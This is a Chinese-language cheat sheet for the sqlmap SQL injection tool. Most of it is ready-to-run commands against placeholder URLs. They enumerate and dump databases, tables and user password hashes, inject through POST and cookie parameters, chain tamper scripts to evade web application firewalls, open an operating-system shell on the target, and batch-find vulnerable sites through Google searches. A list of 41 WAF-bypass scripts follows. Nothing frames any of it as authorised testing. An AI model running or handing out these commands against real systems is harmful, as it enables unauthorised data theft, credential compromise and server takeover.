Sqlmap

1.简介

    sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞
　　 目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。

2.采用五种独特的SQL注入技术，分别是：
   1）基于布尔的盲注，即可以根据返回页面判断条件真假的注入。
   2）基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。
   3）基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。
   4）联合查询注入，可以使用union的情况下的注入。
   5）堆查询注入，可以同时执行多条语句的执行时的注入。

常用格式

sqlmap -u url --dbs //爆数据库
sqlmap -u url --current-db //爆当前库
sqlmap -u url --current-user //爆当前用户
sqlmap -u url --users   查看用户权限
sqlmap -u url --tables -D 数据库 //爆表段
sqlmap -u url --columns -T 表段 -D 数据库 //爆字段
sqlmap -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
sqlmap -u url --dump --start=1 --stop=3  -D 数据库  -T 表段 -C 字段 --dump//猜解1到3的字段
sqlmap -u "http://www.xxx.com/newsphp?class=news&id=5&page=1&catalog_id=2" --users --password 爆用户密码

sqlmap -u url --is-dba -v   判断当前数据库的使用者是否是dba
sqlmap -u url --users -v 0  列举数据库的用户
sqlmap -u url --passwords -v 0 获取数据库用户的密码
sqlmap -u url --privileges -v 0 判断当前的权限
sqlmap -u url --dbs -v 0     将所有的数据库列出来
sqlmap -u url --tables -D '表'     爆表
sqlmap -u url --columns -T ‘表’-D ‘数据库’爆列
sqlmap -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
sqlmap -u url --dump -all -v 0

实战命令

sqlmap -u http://xxxx.com/web/?id=1 --random-agent --dump
sqlmap -u http://www.xxx.com/info.asp?id=1 --tamper "apostrophenullencode.py,base64encode.py,modsecurityversioned.py,nonrecursivereplacement.py,randomcase.py,xforwardedfor.py" --level 2 --random-agent --dbs
sqlmap -u "http://ip:8006/index.php" --data="user=username03" --ignore-proxy --random-agent --tamper "space2comment.py,space2hash.py,randomcase.py" -f --banner --dbs

从文件中获取参数

截取post请求，将其内容保存，如logun.txt （可以用burpsuite，wireshark等）

sqlmap -r /path/login.txt -p username

sqlmap -r /root/Desktop/post --batch  全自动post注入

参数:  -r  加载我们的post请求login.txt 　　-p 指定注入用的参数

POST注入

自动检测: sqlmap -u "http://www.xxx.com/news?id=1" --smart --level 3 --users

单个注入: sqlmap -u "http://www.xxx.com/1.php" –data="id=1"

多个post值注入
sqlmap -u "http://www.xxx.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users

自动注入: sqlmap -u http://xxxx.xxxx.com/Login.asp --forms

导入文件注入: sqlmap -r key.txt "name,pass" //不知道 key.txt 的位置

登录cookie
sqlmap -u “http://www.xxx.com/vuln.php” --data=”query=foobar;id=1″ --param-del=”;” --cookies=”登录成功的cookie信息” -f --banner --dbs --users

COOkie 注入

单个注入
sqlmap -u "http://127.0.0.1/base.php” --cookie "id=1" --dbs --level 2
sqlmap -u "url" --cookie "id=" --clumns -T 表段 --level 2
sqlmap -u "url" --cookie "id=" --dump -T 表段 -C "user,pass" --level 2

伪静态注入： sqlmap -u url/xxx*.html --dbs

请求延时注入
sqlmap –dbs -u usr/x*.html –delay 1(时间,可随意)
sqlmap –dbs -u usr/x*.html –safe-freq 1(次数,可随意)

绕过WAF防火墙
sqlmap -u url -v 3 --dbs --batch --tamper "space2morehash.py"

Google批量检测注入: sqlmap -g 关键词

命令交互注入

参数：--os-cmd,--os-shell
sqlmap -u url --os-shell 使用sqlmap来与目标系统进行命令交互（需要注意必须要提前知道网站根目录在服务器中存放的路径）

WAF绕过脚本(sqlmap/tamper)

01. apostrophemask.py 用UTF-8全角字符替换单引号字符
02. apostrophenullencode.py 用非法双字节unicode字符替换单引号字符
03. appendnullbyte.py 在payload末尾添加空字符编码
04. base64encode.py 对给定的payload全部字符使用Base64编码
05. between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”，“BETWEEN # AND #”替换等于号“=”
06. bluecoat.py 在SQL语句之后用有效的随机空白符替换空格符，随后用“LIKE”替换等于号“=”
07. chardoubleencode.py 对给定的payload全部字符使用双重URL编码（不处理已经编码的字符）
08. charencode.py 对给定的payload全部字符使用URL编码（不处理已经编码的字符）
09. charunicodeencode.py 对给定的payload的非编码字符使用Unicode URL编码（不处理已经编码的字符）
10. concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
11. equaltolike.py 用“LIKE”运算符替换全部等于号“=”
12. greatest.py 用“GREATEST”函数替换大于号“>”
13. halfversionedmorekeywords.py 在每个关键字之前添加MySQL注释
14. ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
15. lowercase.py 用小写值替换每个关键字字符
16. modsecurityversioned.py 用注释包围完整的查询
17. modsecurityzeroversioned.py 用当中带有数字零的注释包围完整的查询
18. multiplespaces.py 在SQL关键字周围添加多个空格
19. nonrecursivereplacement.py 用representations替换预定义SQL关键字，适用于过滤器
20. overlongutf8.py 转换给定的payload当中的所有字符
21. percentage.py 在每个字符之前添加一个百分号
22. randomcase.py 随机转换每个关键字字符的大小写
23. randomcomments.py 向SQL关键字中插入随机注释
24. securesphere.py 添加经过特殊构造的字符串
25. sp_password.py 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
26. space2comment.py 用“/**/”替换空格符
27. space2dash.py 用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符
28. space2hash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
29. space2morehash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
30. space2mssqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
31. space2mssqlhash.py 用磅注释符“#”其次是一个换行符替换空格符
32. space2mysqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
33. space2mysqldash.py 用破折号注释符“--”其次是一个换行符替换空格符
34. space2plus.py 用加号“+”替换空格符
35. space2randomblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
36. unionalltounion.py 用“UNION SELECT”替换“UNION ALL SELECT”
37. unmagicquotes.py 用一个多字节组合%bf%27和末尾通用注释一起替换空格符
38. varnish.py 添加一个HTTP头“X-originating-IP”来绕过WAF
39. versionedkeywords.py 用MySQL注释包围每个非函数关键字
40. versionedmorekeywords.py 用MySQL注释包围每个关键字
41. xforwardedfor.py 添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF